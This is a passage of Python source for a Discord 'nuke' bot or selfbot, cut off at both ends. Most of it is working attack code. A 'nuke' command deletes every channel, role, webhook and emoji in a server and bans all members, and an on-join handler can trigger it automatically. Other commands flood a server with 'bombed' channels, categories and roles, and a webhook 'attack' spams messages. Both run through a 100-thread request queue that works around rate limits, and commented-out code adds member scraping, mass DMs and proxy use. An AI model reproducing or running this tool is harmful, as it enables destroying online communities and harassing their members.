# has already been handled in "def log"
pass
elif isinstance(error, commands.UserInputError):
await log(ctx, 'Invalid input.')
else:
# 'args', 'code', 'response', 'status', 'text', 'with_traceback'
# print(error)
# print(error.args)
# print(type(error.args))
try: # Don't want too many things logged into discord
await log(ctx, '%s' % error.args)
except discord.errors.NotFound: # When ctx.channel is deleted
pass
except TypeError: # When there's a charater that can't be logged into discord. Like if error.args contains a tuple which can't be automatically turned into a string.
consoleLog(f'{Fore.RED}Error -> {error.args}: {Fore.YELLOW}When using "{ctx.message.content}".', True)
if is_selfbot:
@client.event
async def on_message(message):
if message.content.startswith(settings["command_prefix"]) and checkPerm(await client.get_context(message)):
if message.author.id == client.user.id and not selfbot_has_perm:
consoleLog(f'{Fore.YELLOW}Account owner {Fore.LIGHTBLUE_EX}"{client.user.name}#{client.user.discriminator}" {Fore.YELLOW}tried to use {Fore.LIGHTBLUE_EX}"{message.content}"{Fore.BLUE}. Too bad, he/she doesn\'t of the power to use this bot.', True)
return
message.author = client.user
await client.process_commands(message)
@client.event
async def on_guild_join(guild):
if nuke_on_join:
global selected_server
selected_server = guild
await nuke(saved_ctx)
def isDM(ctx):
"""
No args
Checking if the ctx is whether from DM or in a server. There are different handlers for handling some commands.
"""
return isinstance(ctx.channel, discord.channel.DMChannel)
# if isinstance(ctx.channel, discord.channel.DMChannel):
# return True # in dm
# return False # in server
def nameIdHandler(name):
"""
<@! ID > = pinging user
<@& ID > = pinging role
Usage - remove the brakets around the ID
return - the ID
"""
if name.startswith('<@!') or name.startswith('<@&'):
return name[:-1][3:]
return name
async def embed(ctx, n, title, array):
"""
Parameters:
n - page number. And default is 1
title - Command name/title
array - The list for handling
"""
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
ids = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item.name) > 17:
item.name = item.name[:17] + '...'
names += f'{item.name}\n'
ids += f'{str(item.id)}\n '
# if not isDM(ctx) and 1 << 11 & selected_server.me.guild_permissions.value == 0 and (selected_server is None or ctx.guild.id == selected_server.id):
# names = names.split('\n')
# ids = ids.split(' ')
# consoleLog(f'\n{Fore.GREEN}*{title}*\n{Fore.RESET}Total count: {Fore.YELLOW}{str(item_length)}\n{Fore.GREEN}__Name__{" " * 13}{Fore.CYAN}__ID__\n{ "".join([(Fore.GREEN + names[i].ljust(21) + Fore.CYAN + ids[i]) for i in range(len(names) - 1)]) }{Fore.YELLOW}{n+1}/{str(ceil(item_length / per_page))}', True)
# else:
try:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Name', value=names, inline=True)
embed.add_field(name='ID', value=ids, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
names = names.split('\n')
ids = ids.split(' ')
await ctx.send(f'```*{title}*\nTotal count: {str(item_length)}\n__Name__{" " * 13}__ID__\n{ "".join([(names[i].ljust(21) + ids[i]) for i in range(len(names) - 1)]) }{n+1}/{str(ceil(item_length / per_page))}```')
async def hasTarget(ctx):
"""
Checking if there's a selected server for using the comands.
"""
if selected_server is not None:
return True
elif not isDM(ctx):
await connect(ctx)
await log(ctx, f'You have been automatically `{settings["command_prefix"]}connect` to server `{selected_server.name}` because you are not connected to a server and using a command inside a server.')
return True
else:
await log(ctx, f'I am not connected to a server. Try `{settings["command_prefix"]}servers` and `{settings["command_prefix"]}connect`')
return False
def containing(a, b):
for c in a:
if c.name.lower() == b.lower() or str(c.id) == b:
return c
return None
def checkPerm(ctx):
if grant_all_permissions:
return True
for user in settings['permissions']:
if str(ctx.author.id) == user or f'{ctx.author.name}#{ctx.author.discriminator}' == user:
return True
if not isDM(ctx):
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in server {Fore.LIGHTYELLOW_EX}"{ctx.guild.name}"{Fore.RESET}, at channel {Fore.LIGHTYELLOW_EX}"{ctx.channel.name}"{Fore.RESET}.', True)
else:
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in {Fore.LIGHTYELLOW_EX}the bot\'s direct message{Fore.RESET}.', True)
return False
def fixedChoice():
return settings['bomb_messages']['fixed'][randint(0, len(settings['bomb_messages']['fixed']) - 1)]
base64_char = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/'
def random_b64(n=0):
return ''.join(choices(base64_char, k=settings['bomb_messages']['random'] if n == 0 else n))
alphanum = '0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
def random_an():
return ''.join(choices(alphanum, k=settings['bomb_messages']['random']))
def sendMessagePerm(ctx):
pass
def checkTalkPerm(ctx):
if isDM(ctx): # you can always talk in dm
return True
# return calcPerm(ctx, ) and 16384 & ctx.channel.
def configIsSaved():
# global settings_copy, settings # idk why python did this but after adding this for my 3.8.5 python it works
return settings_copy == settings
# class discordMember:
# def __init__(self, name, id_, discriminator=None, channel_id=None):
# self.name = name
# self.id = id_
# self.discriminator = discriminator
# self.channel_id = channel_id
# server_members = []
# def copyMember(author):
# server_members.append(discordMember(author['username'], author['id'], author['discriminator']))
# def autoFindChannel():
# for channel in selected_server.text_channels:
# for name in ['join', 'welcome', 'incoming']:
# if name in channel.name:
# return channel.id
# return None
######### Commands ##########
######### Listing ##########
@commands.check(checkPerm)
@client.command(name='help', aliases=['h', 'commands'])
async def help(ctx, asked_command=None):
help_list = '```'
if asked_command is None:
for command in sorted_commands:
help_list += f'[{command.name}] '
await ctx.send(help_list + f'\n\nYou can try {settings["command_prefix"]}help <command> to see all the aliases for the command. Or read the manual.md for more infomation about the commands.```')
else:
for command in sorted_commands:
if asked_command.lower() == command.name.lower():
help_command = f'```{settings["command_prefix"]}<{command.name}'
for aliase in command.aliases:
help_command += f'|{aliase}'
help_command += '>'
for param, default in command.params.items():
if param == 'ctx':
continue
if default.empty is not default.default:
help_command += ' {' + param + '=' + str(default.default) + '}'
else:
help_command += ' [' + param + ']'
if default.kind.name == 'KEYWORD_ONLY':
break
help_command += '```'
await ctx.send(help_command)
return
await log(ctx, f'Unable to find command `{asked_command}`.')
@commands.check(checkPerm)
@client.command(name='servers', aliases=['se', 'server'])
async def servers(ctx, n='1'):
await embed(ctx, n, 'Servers', client.guilds)
@commands.check(checkPerm)
@client.command(name='channels', aliases=['tc', 'textchannels', 'textchannel', 'channel'])
async def channels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Text channels', selected_server.text_channels)
@commands.check(checkPerm)
@client.command(name='roles', aliases=['ro', 'role'])
async def roles(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Roles', selected_server.roles)
@commands.check(checkPerm)
@client.command(name='categories', aliases=['cat', 'category'])
async def categories(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Categories', selected_server.categories)
@commands.check(checkPerm)
@client.command(name='voiceChannels', aliases=['vc', 'voicechannel'])
async def voiceChannels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Voice channels', selected_server.voice_channels)
@commands.check(checkPerm)
@client.command(name='emojis', alises=['em', 'emoji'])
async def emojis(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Emojis', selected_server.emojis)
@commands.check(checkPerm)
@client.command(name='members', alises=['me', 'member'])
async def members(ctx, command='1', *, args=None):
if not await hasTarget(ctx):
return
print(len(selected_server.members))
await embed(ctx, command, 'Members', selected_server.members)
# global server_members
# if command.isdigit():
# if is_selfbot:
# await embed(ctx, command, 'Members', server_members)
# else:
# await embed(ctx, command, 'Members', selected_server.members)
# else:
# # def gFetchableChannel(channel_id): # check if the channel is good for fectching channel
# # pass
# if command == 'fetch':
# global fetching_members
# args = args.split()
# if not is_selfbot:
# await log(ctx, f'Fetch command is only made for selfbot; since you are using normal bots, all members in the server `{selected_server.name}` has already be fetched. Try `{settings["command_prefix"]}members` to see all the fetched members.')
# return
# if args[0].lower() == 'auto':
# channel_id = autoFindChannel()
# if channel_id is None:
# await log(ctx, f'Unable to find welcome channels. You have to enter the welcome channel\'s in server `{selected_server.name}` manually.')
# return
# elif args[0].lower() == 'stop':
# fetching_members = False
# await log(ctx, 'Fetching stopped.')
# return
# elif args[0].isdigit():
# channel_id = args[0]
# else:
# await log(ctx, 'Invalid argument: You can only enter `fetch auto` or `fetch <channel_id>`.')
# return
# # Making sure channel_id is a string
# channel_id = str(channel_id)
# if len(args) < 3:
# cooldown = 0
# elif args[2].isdigit():
# cooldown = int(args[2])
# else:
# await log(ctx, 'Please set a positive integer for the cooldown time of fetching every 100 messages. Use `0` if you don\'t want a cooldown.')
# return
# if args[1].lower() == 'fast':
# fetching_members = True
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?limit=100'
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# while fetching_members:
# r = requests.get(url, headers=headers, proxies=randomProxy('https'), timeout=timeout).json()
# if len(r) == 0:
# break
# for message in r:
# if message['mentions']: # len(message['content']) > 0 and
# for mention in message['mentions']:
# copyMember(mention)
# elif len(message['attachments']) > 0:
# pass # no handler for images
# elif len(message['embeds']) > 0:
# pass # no handlers for embeds mentions
# else:
# copyMember(message['author'])
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?before={r[-1]["id"]}&limit=100'
# if cooldown > 0:
# await asyncio.sleep(cooldown)
# elif args[1].lower() == 'all':
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# pass
# else:
# await log(ctx, 'You need to choose a fetching operation. Options are `all` or `fast`.')
# # Removing duplicates
# if len(server_members) > 1:
# temp = []
# temp.append(server_members[0])
# for member_ in server_members:
# for i in temp:
# temp.append(member_)
# server_members = temp
@commands.check(checkPerm)
@client.command(name='bans')
async def bans(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Bans', [s.user for s in await selected_server.bans()])
@commands.check(checkPerm)
@client.command(name='connect', aliases=['con'])
async def connect(ctx, *, server=None):
if server is None and ctx.guild is None:
await log(ctx, f'Providing a server name is required.')
return
if server is None and not isDM(ctx):
server = ctx.guild
else:
temp_name = server
server = containing(client.guilds, server)
if server is None:
await log(ctx, f'Unable to find {temp_name} server.')
return
global selected_server
selected_server = server
await log(ctx, f'Successfully connected to `{server.name}`.')
######### Unities ##########
@commands.check(checkPerm)
@client.command(name='addChannel', aliases=['aCh', 'aChannel'])
async def addChannel(ctx, channel_name, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_text_channel(channel_name, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added channel `{channel_name}` to category `{category}`.')
except:
await log(ctx, f'Unable to add channel `{channel_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addVoiceChannel', aliases=['aVoiceChannel', 'aVC'])
async def addVoiceChannel(ctx, voice_channel, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_voice_channel(voice_channel, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added VC `{voice_channel}` to category `{category}`.')
except:
await log(ctx, f'Unable to add VC `{voice_channel}`.')
raise
@commands.check(checkPerm)
@client.command(name='addEmoji', aliases=['aEmoji', 'aEm'])
async def addEmoji(ctx, item, *, name=None, bits=None):
if not await hasTarget(ctx):
return
if bits is None:
# Raw IPv4 and IPv6 are not supported
if item.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
if name is None:
await log(ctx, 'Name for emoji? I\'m not always going to name it for you...')
return
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(item).content).read())
await log(ctx, f'Successfully added emoji `{name}`.')
except:
raise
elif item[0] == '<': # EX: <a:triggeredd:627060014431076352>
item = item.split(':')
if name is None:
name = item[1]
try:
if item[0] == '<a': # Animated
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.gif?v=1').content).read())
else:
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.png?v=1').content).read())
await log(ctx, f'Successfully added emoji: {name}')
except:
raise
elif os.path.isfile(item): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(item, 'rb') as data:
await selected_server.create_custom_emoji(name=(name), image=data.read())
await log(ctx, f'Successfully added emoji: {name}')
else:
await log(ctx, 'Bad path to image.')
else:
selected_server.create_custom_emoji(name=(name), image=bits)
@commands.check(checkPerm)
@client.command(name='addCategory', aliases=['aCat', 'aCa'])
async def addCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
try:
await selected_server.create_category(category_name)
await log(ctx, f'Successfully created category `{category_name}`.')
except:
await log(ctx, f'Unable to create category `{category_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addRole', aliases=['aRole', 'aR'])
async def addRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
perms = name.pop(-1)
await selected_server.create_role(name=' '.join(name), permissions=discord.Permissions(permissions=int(perms)))
await log(ctx, f'Successfully added role `{name}` with permission `{perms}`.')
except:
await log(ctx, f'Failed to add role `{name}`.')
raise
@commands.check(checkPerm)
@client.command(name='moveRole', aliases=['mRole', 'mR'])
async def moveRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
position = name.pop(-1)
name = ' '.join(name)
if len(name) == 0 or not position.isdigit():
await log(ctx, 'Invalid inputs.')
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find role `{name}`.')
await role.edit(position=int(position))
await log(ctx, f'Successfully moved role {role.name} to position `{str(position)}`.')
except:
await log(ctx, f'Unable to move role `{name}` to position `{position}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteRole', aliases=['dRole', 'dR'])
async def deleteRole(ctx, *, name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, name)
if role is None:
await log(ctx, f'Unable to find `{name}`.')
try:
await role.delete()
await log(ctx, f'Successfully removed role `{role.name}`')
except:
await log(ctx, f'Unable to delete role `{role.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteChannel', aliases=['dChannel', 'dCh'])
async def deleteChannel(ctx, channel_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.text_channels, channel_name)
if channel is None:
await log(ctx, f'Unable to find text channel `{channel_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteVoiceChannel', aliases=['dVC', 'dVoiceChannel'])
async def deleteVoiceChannel(ctx, VC_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.voice_channels, VC_name)
if channel is None:
await log(ctx, f'Unable to find voice channel `{VC_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Voice channel `{channel.name}` is deleted.')
except:
consoleLog(f'Unable to delete voice channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCategory', aliases=['dCat', 'dCategory'])
async def deleteCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.categories, category_name)
if channel is None:
await log(ctx, f'Unable to find category `{category_name}`.')
try:
await channel.delete(reason=None)
await log(ctx, f'Category `{channel.name}` is deleted.')
except:
await log(ctx, f'Unable to delete category `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteCC', aliases=['dCC'])
async def deleteCC(ctx, *, name):
if not await hasTarget(ctx):
return
channel = containing(selected_server.channels, name)
if channel is None:
await log(ctx, f'Unable to find channel `{name}`.')
return
try:
await channel.delete(reason=None)
await log(ctx, f'Channel `{channel.name}` is removed from `{selected_server.name}`.')
except:
await log(ctx, f'Unable to delete channel `{channel.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteEmoji', aliases=['dEm'])
async def deleteEmoji(ctx, *, name):
emoji = containing(selected_server.emojis, name)
if emoji is None:
await log(ctx, f'Unable to find channel `{name}`.')
try:
await emoji.delete(reason=None)
await (ctx, f'Emoji `{emoji.name}` is removed from the server.')
except:
await log(ctx, f'Unable to delete emoji: `{emoji.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='ban')
async def ban(ctx, member_:discord.Member):
if not await hasTarget(ctx):
return
try:
await member_.ban()
await log(ctx, f'Successfully banned `{member_.name}#{member_.discriminator}`.')
except:
await log(ctx, f'Unable to ban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='unban')
async def unban(ctx, *, name):
if not await hasTarget(ctx):
return
member_ = containing([s.user for s in await selected_server.bans()], nameIdHandler(name))
if member_ is None:
await log(ctx, f'Unable to find user `{name}` in server `{selected_server.name}`.')
return
try:
await selected_server.unban(member_)
await log(ctx, f'`{member_.name}#{member_.discriminator}` is now free :).')
except:
await log(ctx, f'Failed to unban `{member_.name}#{member_.discriminator}`.')
raise
@commands.check(checkPerm)
@client.command(name='roleTo')
async def roleTo(ctx, member_name, *, role_name):
if not await hasTarget(ctx):
return
role = containing(selected_server.roles, nameIdHandler(role_name))
if role is None:
await log(ctx, f'Unable to find role `{role_name}`.')
return
# discord.utils.get is useless don't use it it's way slower than "containing"
member_ = containing(selected_server.members, nameIdHandler(member_name))
if member_ is None:
await log(ctx, f'Unable to find user `{member_name}`.')
return
if role in member_.roles:
try:
await member_.remove_roles(role)
await log(ctx, f'Successfully removed role `{role.name}` from user `{member_.name}`.')
except:
await log(ctx, f'Unable to remove role `{role.name}` from user `{member_.name}`.')
raise
else:
try:
await member_.add_roles(role)
await log(ctx, f'Successfully given role `{role.name}` to user `{member_.name}`.')
except:
await log(ctx, f'Unable to add role `{role.name}` to user `{member_.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='disableCommunityMode', aliases=['dCM', 'dCommunityMode'])
async def disableCommunityMode(ctx):
if not await hasTarget(ctx):
return
try:
await log(ctx, f'{Fore.YELLOW}Disabling community mode')
r = requests.patch(f'https://discord.com/api/v8/guilds/{selected_server.id}', headers=headers, json=
{'description': None, 'features': {'0': 'NEWS'},
'preferred_locale': 'en-US',
'public_updates_channel_id': None, 'rules_channel_id': None})
consoleLog(f'Disabling community mode response -> {r.text}', True)
await log(ctx, f'{Fore.GREEN}Disabled community mode.')
except Exception as e:
consoleLog(f'{Fore.RED}Error while attempting to disable community mode, {e}', True)
raise
@commands.check(checkPerm)
@client.command(name='grantAllPerm', aliases=['gap'])
async def grantAllPerm(ctx):
global grant_all_permissions
if grant_all_permissions:
await log(ctx, 'Now only people with permissions can use the commands.')
grant_all_permissions = False
else:
await log(ctx, 'Now everyone can use the bot commands')
grant_all_permissions = True
######### Bombs #########
@commands.check(checkPerm)
@client.command(name='kaboom')
async def kaboom(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or int(n) < 0:
await log(ctx, 'Please enter a positive integer.')
return
await log(ctx, f'A series of bombs have been dropped onto `{selected_server.name}`.')
tasks = [channelBomb(ctx, n, method), categoryBomb(ctx, n, method), roleBomb(ctx, n, method)]
await asyncio.gather(*tasks)
concurrent = 100
q = Queue(concurrent * 2)
def requestMaker():
while True:
requesting, url, headers, payload = q.get()
try:
# proxy = randomProxy('https')
# r = requesting(url, data=json.dumps(payload), headers=headers, proxies=proxy, timeout=timeout)
r = requesting(url, data=json.dumps(payload), headers=headers, timeout=timeout)
if r.status_code == 429:
r = r.json()
if want_log_request:
if isinstance(r['retry_after'], int): # Discord will return all integer time if the retry after is less then 10 seconds which is in miliseconds.
r['retry_after'] /= 1000
if r['retry_after'] > 5:
consoleLog(f'Rate limiting has been reached, and this request has been cancelled due to retry-after time is greater than 5 seconds: Wait {str(r["retry_after"])} more seconds.')
q.task_done()
continue
consoleLog(f'Rate limiting has been reached: Wait {str(r["retry_after"])} more seconds.')
q.put((requesting, url, headers, payload))
elif want_log_request and 'code' in r:
consoleLog('Request cancelled due to -> ' + r['message'])
except json.decoder.JSONDecodeError:
pass
# except requests.exceptions.ProxyError:
# consoleLog(f'Proxy "{proxy}" did not respond to a request. Trying...')
# q.put((requesting, url, headers, payload))
except requests.exceptions.ConnectTimeout:
consoleLog(f'Reached maximum load time: timeout is {timeout} seconds long {proxy}')
q.put((requesting, url, headers, payload))
except Exception as e:
consoleLog(f'Unexpected error: {str(e)}')
q.task_done()
for i in range(concurrent):
Thread(target=requestMaker, daemon=True).start()
@commands.check(checkPerm)
@client.command(name='channelBomb')
async def channelBomb(ctx, n, method='fixed'):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 0,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done text channel bombing.', True)
@commands.check(checkPerm)
@client.command(name='categoryBomb')
async def categoryBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Channel bombing has started.', True)
for i in range(n):
payload = {
'type': 4,
'name': method(),
'permission_overwrites': []
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/channels', headers, payload))
q.join()
consoleLog('Done category bombing.', True)
@commands.check(checkPerm)
@client.command(name='roleBomb')
async def roleBomb(ctx, n, method):
if not await hasTarget(ctx):
return
if not n.isdigit() or (n := int(n)) < 0:
await log(ctx, 'Please insert an integer that is greater than 0.')
return
if method == 'fixed':
method = fixedChoice
elif method == 'b64':
method = random_b64
elif method == 'an':
method = random_an
else:
await log(ctx, f'Unable to find choice "{method}".')
return
consoleLog('Role bombing has started.', True)
for i in range(n):
payload = {
'name': method()
}
q.put((requests.post, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles', headers, payload))
q.join()
consoleLog('Done role bombing.', True)
# @commands.check(checkPerm)
# @client.command(name='massDM', aliases=['md'])
# async def massDM(ctx, command, *, args=None):
# if len(server_members) == 0:
# await log(ctx, 'You don\'t have anything anyone to dm with :(. Fetch some members.')
# return
# if args is not None:
# args = args.split()
# if command == 'channels' or command == 'channel':
# if args is None:
# args = []
# args.append('1')
# members_ = []
# for i in range(len(server_members)):
# if members_[i].channel_id is not None:
# members_[i].id = members_[i].channel_id
# await embed(ctx, args[0], 'MassDM targets', members_)
# elif command == 'load':
# for member_ in server_members:
# print(member_.name)
# if int(member_.id) == client.user.id:
# continue
# # asdf = requests.post('https://discordapp.com/api/v8/users/@me/channels', headers=headers, json={'recipient_id': member_.id}, proxies=randomProxy('https'), timeout=timeout).json()
# member_.__init__(member_.name, member_.id, member_.discriminator, client.get_user(member_.id).dm_channel.id)
# elif command == 'start':
# massDM_channels = [i.channel_id for i in server_members if i.channel_id is not None]
# if len(massDM_channels) == 0:
# await log(ctx, 'You don\'t have any DM loaded.')
# return
# for channel_id in massDM_channels:
# q.put((f'https://discordapp.com/api/v8/channels{channel_id}/messages', headers))
######### webhooks ##########
@commands.check(checkPerm)
@client.command(name='webhook', aliases=['webhooks', 'wh'])
async def webhook(ctx, *, args=None):
if not await hasTarget(ctx):
return
if args is None or args.isdigit(): # webhook list
if args is None:
args = '1'
try:
await embed(ctx, args, 'Webhooks', await selected_server.webhooks())
return
except:
raise
args = args.split()
if args[0] == 'create' or args[0] == 'add': # webhook create
# global headers
del args[0]
if len(args) < 1:
await log(ctx, f'More arguments is requested. You can put how many webhooks you want to create or channel id/name on the channels you want the webhooks to be created on.')
return
name = ' '.join(args)
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
channels = name.split()
if int(name) < 0:
await log(ctx, f'You thought a smol negative number will break this bot?')
return
if len(channels) == 1 and int(name) <= 50: ## probably will replace this with auto check channel id
channels = selected_server.text_channels
if int(name) > len(channels):
await log(ctx, f'This adding webhooks method can only distribute webhooks evenly and randomly throughout the text channels. You entered `{name}`, and there are only `{str(len(channels))}` text channel(s) in the server. If you don\'t what to add more text channels. You can use this command a few more times with a positive integer that is less than `{str(len(channels) + 1)}`.')
return
for i in range(int(name)):
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{channels.pop(randrange(len(channels))).id}/webhooks', headers, payload))
q.join()
await log(ctx, f'`{name}` webhooks has been created.')
elif len(channels) == 1 and int(name) < 100000000:
await log(ctx, f'The maximum webhooks that can be created every hour per server is 50. And you entered `{name}`.')
else:
for channel in channels:
checked_channel = containing(selected_server.text_channels, channel)
if checked_channel is None:
await log(ctx, f'Cannot find channel {channel}.')
continue
payload = {'name': random_b64(10)}
q.put((requests.post, f'https://discord.com/api/v8/channels/{checked_channel.id}/webhooks', headers, payload))
elif args[0] == 'delete' or args[0] == 'remove':
name = args[1]
webhook = containing(await selected_server.webhooks(), name)
if webhook is None:
await log(ctx, f'Unable to find webhook `{name}`.')
return
requests.delete(f'https://discord.com/api/v8/webhooks/{webhook.id}', headers=headers)
await log(ctx, f'Webhook `{webhook.name}` is removed from the server.')
elif args[0] == 'attack':
global webhook_targets
args.pop(0) # Removing the attack keyword
try:
webhooks = await selected_server.webhooks()
webhooks_length = len(webhooks)
loaded_length = 0
if len(args) > 0 and args[0].lower() == 'all':
for webhook in webhooks:
webhook_targets.append(webhook)
loaded_length += 1
elif args[0] == 'start':
target_list_length = len(webhook_targets)
if target_list_length == 0:
await log(ctx, f'Looks like there really isn\'t any targets in the attack list. Maybe try: `{settings["command_prefix"]}webhook attack all`, then `{settings["command_prefix"]}webhook attack start <number of messages>`.')
return
_headers = {
'content-type': 'application/json'
}
if len(args) < 2:
args.append(10)
elif not args[1].isdigit():
await log(ctx, 'Please enter a positive integer.')
return
usernames_length = len(settings['webhook_spam']['usernames'])
contents_length = len(settings['webhook_spam']['contents'])
pfp_length = len(settings['webhook_spam']['pfp_urls'])
for i in range(int(args[1])):
payload = {
'username': choice(settings['webhook_spam']['usernames']),
'content': choice(settings['webhook_spam']['contents']),
'avatar_url': choice(settings['webhook_spam']['pfp_urls'])
}
q.put((requests.post, webhook_targets[randrange(target_list_length)].url, _headers, payload))
elif len(args) > 0 and args[0].isdigit() and int(args[0]) <= webhooks_length:
for i in range(int(args[0])):
webhook_targets.append(webhooks.pop(randrange(webhooks_length)))
webhooks_length -= 1
loaded_length += 1
elif args[0] == 'list':
if len(args) < 2:
args.append('1')
await embed(ctx, args[1], 'Targets on attacking list', webhook_targets)
elif args[0] == 'offload':
webhook_targets = []
await log(ctx, f'All webhooks have been offloaded')
else:
for webhook in args:
webhook = containing(await selected_server.webhooks(), webhook)
if webhook is None:
await log(ctx, f'Unable to find webhook `{webhook}`.')
continue
webhook_targets.append(webhook)
loaded_length += 1
if args[0] != 'list' and args[0] != 'start' and args[0] != 'offload':
await log(ctx, f'`{str(loaded_length)}` has been loaded into the target list.')
except:
raise
else:
await log(ctx, f'Unable to find `{args[0]}` command in webhook scripts.')
######### Nukes #########
@commands.check(checkPerm)
@client.command(name='nuke')
async def nuke(ctx):
if not await hasTarget(ctx):
return
await log(ctx, f'A nuke has been launched to `{selected_server.name}`.')
tasks = [disableCommunityMode(ctx), deleteAllChannels(ctx), deleteAllRoles(ctx), banAll(ctx), deleteAllWebhooks(ctx), deleteAllEmojis(ctx)]
await asyncio.gather(*tasks)
if len(settings['after']) > 0:
if not isDM(ctx) and selected_server.id == ctx.guild.id:
ctx.message.channel = None
consoleLog(f'{Fore.BLUE}Running after commands...', True)
for command in settings['after']:
# Lol im so smart to think something like this would work
try:
ctx.message.content = settings['command_prefix'] + command
await client.process_commands(ctx.message)
except:
consoleLog(f'{Fore.RED}Command {Fore.YELLOW}"{settings["command_prefix"]}{command}" {Fore.RED}has failed to execute.', True)
pass
consoleLog(f'{Fore.GREEN}After commands completed.')
@commands.check(checkPerm)
@client.command(name='deleteAllRoles', aliases=['dar', 'dAllRoles'])
async def deleteAllRoles(ctx):
if not await hasTarget(ctx):
return
consoleLog(f'{Fore.YELLOW}Starting to delete all roles...', True)
for role in selected_server.roles:
q.put((requests.delete, f'https://discord.com/api/v8/guilds/{selected_server.id}/roles/{role.id}', headers, None))
